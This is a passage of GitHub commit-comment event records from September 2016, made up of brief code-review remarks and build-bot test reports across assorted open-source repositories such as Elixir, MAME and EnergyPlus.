{"id":"4539748340","type":"CommitCommentEvent","actor":{"login":"dwradcliffe"},"repo":{"name":"rubygems/rubygems.org"},"payload":{"comment":{"id":18961665,"position":null,"line":null,"path":null,"commit_id":"53eadf5184bad12e9e6093108fdd8b3dd7c55475","created_at":"2016-09-09T12:21:38Z","updated_at":"2016-09-09T12:21:38Z","body":"Yes that too.\n\nOn Friday, September 9, 2016, Josef Šimánek <notifications@github.com>\nwrote:\n\n> I think the reason for this was to be able restore gems back and ensure\n> they are the same.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rubygems/rubygems.org/commit/53eadf5184bad12e9e6093108fdd8b3dd7c55475#commitcomment-18961627>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHQQnQRpn20YJkMP1FyLeTeJkdChTr4ks5qoU6MgaJpZM4J4Wn4>\n> .\n>\n\n\n-- \n---\nDavid Radcliffe\n"}},"created_at":"2016-09-09T12:21:38Z"}
{"id":"4539750033","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18961666,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T12:22:04Z","updated_at":"2016-09-09T12:22:04Z","body":"Obviously buggy, I'm not saying to fix it, just try to beat it via going through every tile."}},"created_at":"2016-09-09T12:22:04Z"}
{"id":"4539750143","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18961667,"position":null,"line":null,"path":null,"commit_id":"1191fc104c9cb7a9768ccd8d7f08a85fac220afc","created_at":"2016-09-09T12:22:07Z","updated_at":"2016-09-09T12:22:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;yDGgnDZW&#x2F;45-github-repository-and-first-commit\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Github repository and first commit</a>"}},"created_at":"2016-09-09T12:22:07Z"}
{"id":"4539752875","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":18961677,"position":null,"line":null,"path":null,"commit_id":"71b21384c48c49a28e08d6b6fdf695ad84a02307","created_at":"2016-09-09T12:22:43Z","updated_at":"2016-09-09T12:22:43Z","body":"This looks good!"}},"created_at":"2016-09-09T12:22:43Z"}
{"id":"4539753005","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18961678,"position":null,"line":null,"path":null,"commit_id":"f9669b34d7203692aa165c5ec71ecd2c541aa177","created_at":"2016-09-09T12:22:45Z","updated_at":"2016-09-09T12:22:45Z","body":"@ExSport No side effect.\r\n\r\nThat just enforce what is already done by DLNA hardcoded content-type sended when using LPCM transcoding and \"Automatic audio resampling\".\r\n"}},"created_at":"2016-09-09T12:22:45Z"}
{"id":"4539753405","type":"CommitCommentEvent","actor":{"login":"srazi"},"repo":{"name":"luastoned/turbo-telegram"},"payload":{"comment":{"id":18961680,"position":397,"line":385,"path":"telegram.lua","commit_id":"3e12303127fe9f3a39f7af088d43a278173aea19","created_at":"2016-09-09T12:22:50Z","updated_at":"2016-09-09T12:22:50Z","body":"Oops, sorry my bad.\r\nIndeed my code was based on old code design.\r\n```\r\ntelegram = require(\"./turbo-telegram/telegram\")\r\ntelegram.setBotToken(bot_token)\r\n```\r\nthat I thought it is enough to change `setBotToken` to `createBot` :D \r\nBut now I changed it to:\r\n```\r\n\r\nturbo_telegram = require(\"./turbo-telegram/telegram\")\r\ntelegram = turbo_telegram.createBot(bot_token)\r\n```\r\nAnd use `:` instead of `.` and now it works correctly.\r\n\r\n**P.S.:** Would you please give me a hint about what should I google to find out difference `.` vs `:` and advantages of the new code design?"}},"created_at":"2016-09-09T12:22:50Z"}
{"id":"4539754201","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18961681,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T12:23:02Z","updated_at":"2016-09-09T12:23:02Z","body":"Yeah perhaps we should update hidden-options. But it's not important to have bash completion for it - it's very much a debug/test thingy."}},"created_at":"2016-09-09T12:23:02Z"}
{"id":"4539757809","type":"CommitCommentEvent","actor":{"login":"aapav01"},"repo":{"name":"AOSEP/manifest"},"payload":{"comment":{"id":18961689,"position":null,"line":null,"path":null,"commit_id":"b2fabdfc4f790ca6acecc023021cf11166d7a5fb","created_at":"2016-09-09T12:23:53Z","updated_at":"2016-09-09T12:23:53Z","body":"nope\r\n"}},"created_at":"2016-09-09T12:23:53Z"}
{"id":"4539763860","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18961707,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T12:25:19Z","updated_at":"2016-09-09T12:25:19Z","body":"Actually I was contemplating supporting things like `--format=all-gpu` in the way that \"all\" will override `[Formats.Disabled]` and then it will pass `gpu` (or anything else, eg. wildcards) on to the old code for selecting GPU-only. Not sure if it's worth the bloat."}},"created_at":"2016-09-09T12:25:19Z"}
{"id":"4539765175","type":"CommitCommentEvent","actor":{"login":"JamesRamm"},"repo":{"name":"JamesRamm/leaflet-sidenav"},"payload":{"comment":{"id":18961716,"position":null,"line":null,"path":null,"commit_id":"ad6a440288eea4627514f048c6331c7a620a357b","created_at":"2016-09-09T12:25:36Z","updated_at":"2016-09-09T12:25:36Z","body":"a possibility, if you are interested, would be to merge this into your fork and pull in the bug fixes from Turbo8\r\nIt would mean dropping jquery (ol3, gmaps) support...\r\nI dont have much experience with either so couldnt really comment on the userbase, but I agree, would be interesting. I think keeping it doing 1 thing only (leaflet) is a good idea though.\r\n\r\n"}},"created_at":"2016-09-09T12:25:36Z"}
{"id":"4539767473","type":"CommitCommentEvent","actor":{"login":"YvanKlaver"},"repo":{"name":"zwyber/pie"},"payload":{"comment":{"id":18961724,"position":null,"line":null,"path":null,"commit_id":"649c545cac2af69dade192d4308609c48cf2aca8","created_at":"2016-09-09T12:26:10Z","updated_at":"2016-09-09T12:26:10Z","body":"Question, Why did you add game.h and game.cpp to Source files? It now tries to define the imported libraries from framework.h that have not been build yet (for instance vecmath.cpp and objects.cpp) in two different builds: game.cpp.obj and main.cpp.obj, which will not work."}},"created_at":"2016-09-09T12:26:10Z"}
{"id":"4539769615","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961731,"position":36,"line":3003,"path":"lib/elixir/lib/kernel.ex","commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:26:40Z","updated_at":"2016-09-09T12:26:40Z","body":"the guard check is unnecessary here since all integer elements must be integers."}},"created_at":"2016-09-09T12:26:40Z"}
{"id":"4539777157","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18961742,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T12:28:26Z","updated_at":"2016-09-09T12:28:26Z","body":"you could argue that some of those are just badly chosen shortnames in the firstplace tho.  As long as it's a unique identifier there's no need to try and squeeze every word from the title into the short name.\r\n\r\neg \"junkjr\" would likely work fine and is both easy to type and memorable. \r\n\r\n\"speedrda\" already seems perfect to me tho.\r\n\r\n"}},"created_at":"2016-09-09T12:28:26Z"}
{"id":"4539777345","type":"CommitCommentEvent","actor":{"login":"seenunit"},"repo":{"name":"seenunit/DesignWorld"},"payload":{"comment":{"id":18961743,"position":5,"line":631,"path":"src/designworld/GLManager.cpp","commit_id":"ec0aa2cc3ca39531894b582260c47635c84d4b2f","created_at":"2016-09-09T12:28:28Z","updated_at":"2016-09-09T12:28:28Z","body":"#5 fit sketcher in view here"}},"created_at":"2016-09-09T12:28:28Z"}
{"id":"4539779847","type":"CommitCommentEvent","actor":{"login":"BinarywoodB"},"repo":{"name":"BinarywoodB/shipAnchor"},"payload":{"comment":{"id":18961759,"position":null,"line":null,"path":null,"commit_id":"2fe70f793a924ef4703444fdc166c5a36b52c0eb","created_at":"2016-09-09T12:29:05Z","updated_at":"2016-09-09T12:29:05Z","body":"哈哈哈 "}},"created_at":"2016-09-09T12:29:05Z"}
{"id":"4539781065","type":"CommitCommentEvent","actor":{"login":"leotrubach"},"repo":{"name":"Stefano80/COBO"},"payload":{"comment":{"id":18961763,"position":12,"line":18,"path":"COBO.py","commit_id":"094b323a12d42c8f0f34129e3ca7fda73d45c458","created_at":"2016-09-09T12:29:22Z","updated_at":"2016-09-09T12:29:22Z","body":"You might want to use `default` kwarg for add_argument() method. But maybe something like this would be better\r\n\r\n```\r\noptimizer_kwargs = {\r\n        'disp': True,\r\n        'callback': t.print_status_msg\r\n    }\r\n    if args.popsize:\r\n        optimizer_kwargs['popsize'] = args.popsize\r\n\r\n    res = scipy.optimize.differential_evolution(t.fitness, t.get_bounds(), **optimizer_kwargs)\r\n```\r\n\r\nThis would allow to use default values of differential_evolution() function"}},"created_at":"2016-09-09T12:29:22Z"}
{"id":"4539782626","type":"CommitCommentEvent","actor":{"login":"BinarywoodB"},"repo":{"name":"BinarywoodB/shipAnchor"},"payload":{"comment":{"id":18961765,"position":1,"line":1,"path":"README.md","commit_id":"2fe70f793a924ef4703444fdc166c5a36b52c0eb","created_at":"2016-09-09T12:29:44Z","updated_at":"2016-09-09T12:29:44Z","body":"lll"}},"created_at":"2016-09-09T12:29:44Z"}
{"id":"4539783076","type":"CommitCommentEvent","actor":{"login":"Eckankar"},"repo":{"name":"Athas/EggsML"},"payload":{"comment":{"id":18961767,"position":null,"line":null,"path":null,"commit_id":"04420f1324b0b668e3fc1ec70de5ca049bc78a91","created_at":"2016-09-09T12:29:50Z","updated_at":"2016-09-09T12:29:50Z","body":"Den må du tage på egen kappe. ;)"}},"created_at":"2016-09-09T12:29:50Z"}
{"id":"4539783140","type":"CommitCommentEvent","actor":{"login":"whatyouhide"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961768,"position":36,"line":3003,"path":"lib/elixir/lib/kernel.ex","commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:29:51Z","updated_at":"2016-09-09T12:29:51Z","body":"You can still construct a range with `%Range{}` though 😕 "}},"created_at":"2016-09-09T12:29:51Z"}
{"id":"4539783548","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18961769,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T12:29:57Z","updated_at":"2016-09-09T12:29:57Z","body":"8 unique characters simply isn't enough to give meaningful mnemonics."}},"created_at":"2016-09-09T12:29:57Z"}
{"id":"4539788585","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18961790,"position":null,"line":null,"path":null,"commit_id":"f0abd864ae4464c10e7bd6a6f712acec25744a55","created_at":"2016-09-09T12:31:02Z","updated_at":"2016-09-09T12:31:02Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (948 of 948 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-26.63%25-green.svg)</a>\n"}},"created_at":"2016-09-09T12:31:02Z"}
{"id":"4539790038","type":"CommitCommentEvent","actor":{"login":"FDarnese"},"repo":{"name":"FDarnese/eLearning"},"payload":{"comment":{"id":18961794,"position":null,"line":null,"path":null,"commit_id":"4dcf14f0b569a0ef011564fb0396e58a5e71466e","created_at":"2016-09-09T12:31:23Z","updated_at":"2016-09-09T12:31:23Z","body":"It start looking pretty damn intresting! :+1: "}},"created_at":"2016-09-09T12:31:23Z"}
{"id":"4539792688","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961811,"position":36,"line":3003,"path":"lib/elixir/lib/kernel.ex","commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:31:59Z","updated_at":"2016-09-09T12:31:59Z","body":"we still agreed that we will not be checking for those ill-formed ranges. that's the reason we were checking before..."}},"created_at":"2016-09-09T12:31:59Z"}
{"id":"4539800189","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18961831,"position":null,"line":null,"path":null,"commit_id":"bb24e035369508ae248539e22a0ea86d162b5075","created_at":"2016-09-09T12:33:45Z","updated_at":"2016-09-09T12:33:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#H1y_yRhcTqC0ikqBIK_itQ"}},"created_at":"2016-09-09T12:33:45Z"}
{"id":"4539800646","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18961833,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-09T12:33:51Z","updated_at":"2016-09-09T12:33:51Z","body":"Because of Classic. And scene setup becomes complex. What benefits of the Studio, if under development only old features? Studio Mode can beat any autoswitching - maybe its implementation not clear to end users or nobody wants to use Studio because of hard to use this mode, that's why people asking for autoswitching? Not complaining, but I feel that something wrong with the Studio itself. Maybe I'm wrong."}},"created_at":"2016-09-09T12:33:51Z"}
{"id":"4539801179","type":"CommitCommentEvent","actor":{"login":"DanielCXT"},"repo":{"name":"Ludeon/RimWorld-PortugueseBrazilian"},"payload":{"comment":{"id":18961835,"position":19,"line":25,"path":"Keyed/Alerts.xml","commit_id":"c518b5d2e15d408cc93e9e28898bc74bfe3f7894","created_at":"2016-09-09T12:34:00Z","updated_at":"2016-09-09T12:34:00Z","body":"Coloque piratas atacarão em breve. Pois \"piratas vão começar em breve\" fica muito estranho. "}},"created_at":"2016-09-09T12:34:00Z"}
{"id":"4539804569","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18961842,"position":null,"line":null,"path":null,"commit_id":"6dda1bd1f9f8761744cdd95e921bbcaa50bd66e3","created_at":"2016-09-09T12:34:48Z","updated_at":"2016-09-09T12:34:48Z","body":"my bad sorry \r\niam using bahasa\r\nwhen i change to eng it's normal again thx "}},"created_at":"2016-09-09T12:34:48Z"}
{"id":"4539805019","type":"CommitCommentEvent","actor":{"login":"magol"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":18961843,"position":7,"line":59,"path":"DokanNet/DokanNet.net4.6.csproj","commit_id":"96e2fa3dea7f8a85243b322708ffbe40596f1023","created_at":"2016-09-09T12:34:55Z","updated_at":"2016-09-09T12:34:55Z","body":"Yes,  it is probably enough,  but it exists a NET46 in the Release configuration.  "}},"created_at":"2016-09-09T12:34:55Z"}
{"id":"4539805844","type":"CommitCommentEvent","actor":{"login":"JarrallB"},"repo":{"name":"JarrallB/fmtcweb-1"},"payload":{"comment":{"id":18961848,"position":1,"line":1,"path":"README.md","commit_id":"a91d4218aa022ddc779a1ad175df7ef67f8c7345","created_at":"2016-09-09T12:35:07Z","updated_at":"2016-09-09T12:35:07Z","body":"Wow"}},"created_at":"2016-09-09T12:35:07Z"}
{"id":"4539806348","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/EmilPortfolio"},"payload":{"comment":{"id":18961849,"position":null,"line":null,"path":null,"commit_id":"2b28180bf930bc3e8ae0603a27a7665253fd6b27","created_at":"2016-09-09T12:35:14Z","updated_at":"2016-09-09T12:35:14Z","body":"Note that this directory does not yet exist. It's at home and is not deployed to the server because the files are unnecessary for the site. We only need the built css-file that compiles together from the scss-files."}},"created_at":"2016-09-09T12:35:14Z"}
{"id":"4539806389","type":"CommitCommentEvent","actor":{"login":"JarrallB"},"repo":{"name":"JarrallB/fmtcweb-1"},"payload":{"comment":{"id":18961850,"position":4,"line":2,"path":"README.md","commit_id":"a91d4218aa022ddc779a1ad175df7ef67f8c7345","created_at":"2016-09-09T12:35:14Z","updated_at":"2016-09-09T12:35:14Z","body":"Such test"}},"created_at":"2016-09-09T12:35:14Z"}
{"id":"4539806892","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"digibib/koha-docker"},"payload":{"comment":{"id":18961851,"position":21,"line":21,"path":"koha-patched/patches/007-SIP-hold_pickup.patch","commit_id":"73916df1ed26f9dfc0d91cb3e329d171b683b41a","created_at":"2016-09-09T12:35:21Z","updated_at":"2016-09-09T12:35:21Z","body":"Er datoen alltid den samme?"}},"created_at":"2016-09-09T12:35:21Z"}
{"id":"4539809356","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18961856,"position":null,"line":null,"path":null,"commit_id":"c50e419878ae5a652a08410faed140e5bd9a921c","created_at":"2016-09-09T12:35:56Z","updated_at":"2016-09-09T12:35:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;qQRNIEoE&#x2F;2-sous-ezmaster-si-l-application-n-a-pas-de-donnees-le-site-est-blanc\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Sous ezmaster, si l&#39;application n&#39;a pas de données, le site est blanc...</a>"}},"created_at":"2016-09-09T12:35:56Z"}
{"id":"4539809544","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18961857,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T12:35:57Z","updated_at":"2016-09-09T12:35:57Z","body":"well as long as people don't use it to try and squeeze even more words into short names where they're not needed (it's meant to be a shortname, not a copy of the description)\r\n\r\nthe ones where people have tried to squeeze in all the words rather than come up with something that is snappy and easy to remember are the worst ones, no matter what you extend to, that isn't going to go away, it will just make the longer ones even worse.\r\n"}},"created_at":"2016-09-09T12:35:57Z"}
{"id":"4539811183","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961861,"position":null,"line":null,"path":null,"commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:36:22Z","updated_at":"2016-09-09T12:36:22Z","body":"rand/1 for ranges is good, but I think we will be using it more with digits,\r\ncould we please have `rand(int, int)`\r\n\r\nI proposed this some time ago.\r\nhttps://github.com/eksperimental/experimental/blob/random/lib/experimental/integer.ex#L25-L57\r\n\r\nthe most common case is get a randong number between 1 and x.\r\nI feel contrieved having to create a range to get that, instead of just passing `rand(1, x)`"}},"created_at":"2016-09-09T12:36:22Z"}
{"id":"4539814162","type":"CommitCommentEvent","actor":{"login":"DanielCXT"},"repo":{"name":"Ludeon/RimWorld-PortugueseBrazilian"},"payload":{"comment":{"id":18961871,"position":null,"line":null,"path":null,"commit_id":"fb01466f4a9ddee20ecbd7e5d97d258cdc34ae98","created_at":"2016-09-09T12:37:08Z","updated_at":"2016-09-09T12:37:08Z","body":"Como faço pra editar os arquivos?"}},"created_at":"2016-09-09T12:37:08Z"}
{"id":"4539815215","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18961873,"position":9,"line":8,"path":"notes_app/notes/tests.py","commit_id":"2aeedb18f42b67f4b798842489817b94e38d3c73","created_at":"2016-09-09T12:37:22Z","updated_at":"2016-09-09T12:37:22Z","body":"I think order matters, should be `['user.json', 'note.json']`"}},"created_at":"2016-09-09T12:37:22Z"}
{"id":"4539816265","type":"CommitCommentEvent","actor":{"login":"whatyouhide"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961877,"position":null,"line":null,"path":null,"commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:37:35Z","updated_at":"2016-09-09T12:37:35Z","body":"I am 👎 on adding even `rand/2`. When you have integers `a` and `b`, I guess you can always do `rand(a..b)`?"}},"created_at":"2016-09-09T12:37:35Z"}
{"id":"4539817018","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961880,"position":36,"line":3003,"path":"lib/elixir/lib/kernel.ex","commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:37:44Z","updated_at":"2016-09-09T12:37:44Z","body":"just for the record, we are not checking anywhere else in code base (not that I know of) "}},"created_at":"2016-09-09T12:37:44Z"}
{"id":"4539817174","type":"CommitCommentEvent","actor":{"login":"sfgraves"},"repo":{"name":"eaobservatory/jsa_proc"},"payload":{"comment":{"id":18961881,"position":38,"line":58,"path":"lib/jsa_proc/jac/file.py","commit_id":"775fc25def73a2b17238e81f2aba726f9192cb38","created_at":"2016-09-09T12:37:48Z","updated_at":"2016-09-09T12:37:48Z","body":"Ta, looks like I forgot to include the comma. I'll push an update, if you haven't already."}},"created_at":"2016-09-09T12:37:48Z"}
{"id":"4539820366","type":"CommitCommentEvent","actor":{"login":"jcharaoui"},"repo":{"name":"Benzhaomin/backupninja"},"payload":{"comment":{"id":18961889,"position":null,"line":null,"path":null,"commit_id":"000d2cf40af10bc0e77b0da4f60142a34b3f3351","created_at":"2016-09-09T12:38:35Z","updated_at":"2016-09-09T12:38:35Z","body":"Backupninja's new home is: https://0xacab.org/riseuplabs/backupninja"}},"created_at":"2016-09-09T12:38:35Z"}
{"id":"4539824672","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18961901,"position":null,"line":null,"path":null,"commit_id":"f0abd864ae4464c10e7bd6a6f712acec25744a55","created_at":"2016-09-09T12:39:37Z","updated_at":"2016-09-09T12:39:37Z","body":"test_build_branch (lefticus) - x86_64-MacOS-10.9-clang: Tests Failed (1532 of 2042 tests passed, 36 test warnings)\n\n * 536 tests had: AUD diffs.\n * 527 tests had: EIO diffs.\n * 420 tests had: ESO small diffs.\n * 358 tests had: MTR small diffs.\n * 509 tests had: RDD diffs.\n * 495 tests had: Table big diffs.\n * 86 tests had: ERR diffs.\n * 115 tests had: ESO big diffs.\n * 420 tests had: BND diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 28 tests had: DXF diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.02%25-red.svg)</a> \n"}},"created_at":"2016-09-09T12:39:37Z"}
{"id":"4539824714","type":"CommitCommentEvent","actor":{"login":"RadekBiba"},"repo":{"name":"RedHatQE/rhui3-automation"},"payload":{"comment":{"id":18961903,"position":null,"line":null,"path":null,"commit_id":"a775b0c578019fe4097ca3b34a12b79b128ffc62","created_at":"2016-09-09T12:39:38Z","updated_at":"2016-09-09T12:39:38Z","body":"Cool stuff!"}},"created_at":"2016-09-09T12:39:38Z"}
{"id":"4539826183","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18961908,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T12:40:00Z","updated_at":"2016-09-09T12:40:00Z","body":"(Note, I'm not entirely against the idea, I just don't know if it's going to be used in an appropriate way, or just cause unnecessarily longer names and churn.  I can see where there are cases that would benefit)\r\n"}},"created_at":"2016-09-09T12:40:00Z"}
{"id":"4539840561","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18961932,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-09T12:43:26Z","updated_at":"2016-09-09T12:43:26Z","body":"@datakurre do you mind documenting what we would need to do in order to upgrade to this version? @idgserpro thinks this will break collective.cover if we do so."}},"created_at":"2016-09-09T12:43:26Z"}
{"id":"4539842736","type":"CommitCommentEvent","actor":{"login":"martindurant"},"repo":{"name":"Azure/azure-data-lake-store-python"},"payload":{"comment":{"id":18961938,"position":4,"line":47,"path":"adlfs/cli.py","commit_id":"eed2c47e537f8eaadb5c6ffcfc89ad703ac22fb0","created_at":"2016-09-09T12:43:57Z","updated_at":"2016-09-09T12:43:57Z","body":"What does this achieve?"}},"created_at":"2016-09-09T12:43:57Z"}
{"id":"4539842952","type":"CommitCommentEvent","actor":{"login":"apahim"},"repo":{"name":"clebergnu/avocado"},"payload":{"comment":{"id":18961939,"position":20,"line":457,"path":"avocado/core/sysinfo.py","commit_id":"cef85b252a266fd440085d53032a2a141b517d7f","created_at":"2016-09-09T12:44:00Z","updated_at":"2016-09-09T12:44:00Z","body":"Yep, it does. Great catch!"}},"created_at":"2016-09-09T12:44:00Z"}
{"id":"4539845488","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":18961947,"position":6,"line":0,"path":"documentation/1.3/tour/language-module.md","commit_id":"a7d994150bbd5b917955112a5de5fa4f9318c2cf","created_at":"2016-09-09T12:44:35Z","updated_at":"2016-09-09T12:44:35Z","body":"thanks."}},"created_at":"2016-09-09T12:44:35Z"}
{"id":"4539859314","type":"CommitCommentEvent","actor":{"login":"Emilysmith901"},"repo":{"name":"Yoast/wordpress-seo"},"payload":{"comment":{"id":18961984,"position":null,"line":null,"path":null,"commit_id":"0e7c562c8e431538a7f8c8636c9674ed4a7fa50f","created_at":"2016-09-09T12:47:45Z","updated_at":"2016-09-09T12:47:45Z","body":"Thanks for sharing such a nice information."}},"created_at":"2016-09-09T12:47:45Z"}
{"id":"4539862672","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18961992,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T12:48:28Z","updated_at":"2016-09-09T12:48:28Z","body":"Hmm I have a good patch now that implements the above. But the syntax becomes inconsistent:\r\n`all-gpu` is \"all gpu formats\", but\r\n`cpu-dynamic` is \"cpu formats minus (aka. except) dynamic\". Not to mention\r\n`all-cpu-dynamic`. This is inconsistent."}},"created_at":"2016-09-09T12:48:28Z"}
{"id":"4539867962","type":"CommitCommentEvent","actor":{"login":"mcg1969"},"repo":{"name":"Azure/azure-data-lake-store-python"},"payload":{"comment":{"id":18962004,"position":4,"line":47,"path":"adlfs/cli.py","commit_id":"eed2c47e537f8eaadb5c6ffcfc89ad703ac22fb0","created_at":"2016-09-09T12:49:41Z","updated_at":"2016-09-09T12:49:41Z","body":" It looks to me like it allows transfers to be interrupted without exiting the command loop."}},"created_at":"2016-09-09T12:49:41Z"}
{"id":"4539868088","type":"CommitCommentEvent","actor":{"login":"beckyricha"},"repo":{"name":"beckyricha/Broadlink-RM-SmartThings-Alexa"},"payload":{"comment":{"id":18962005,"position":null,"line":null,"path":null,"commit_id":"62f4e2eb22d7031b27f01fa42dbf53e8549234f7","created_at":"2016-09-09T12:49:42Z","updated_at":"2016-09-09T12:49:42Z","body":"The on and off commands in the existing code actually do send on and off commands separately to every type of device I've tried. The main thing missing was tracking the state for the tiles in the app, which I didn't need because i was only using it for Alexa.  It's great that you took the time to add that, and the delay/multiple command sequence option which will make me very happy if the hub now supports it.  Because devices controlled by the broadlink have no means of communicating back their actual physical state, I still don't get the reason for the separate commands labeled \"physical,\" though. Why didn't it suffice to just add the tile state to the existing on and off commands?  \n\nOnce i unpack it on a computer instead of a phone this weekend and give it a test run maybe it will make more sense to me, and i apologize for the premature questions.  Even so, a lot of people who use the code don't program  in groovy and would probably find it very 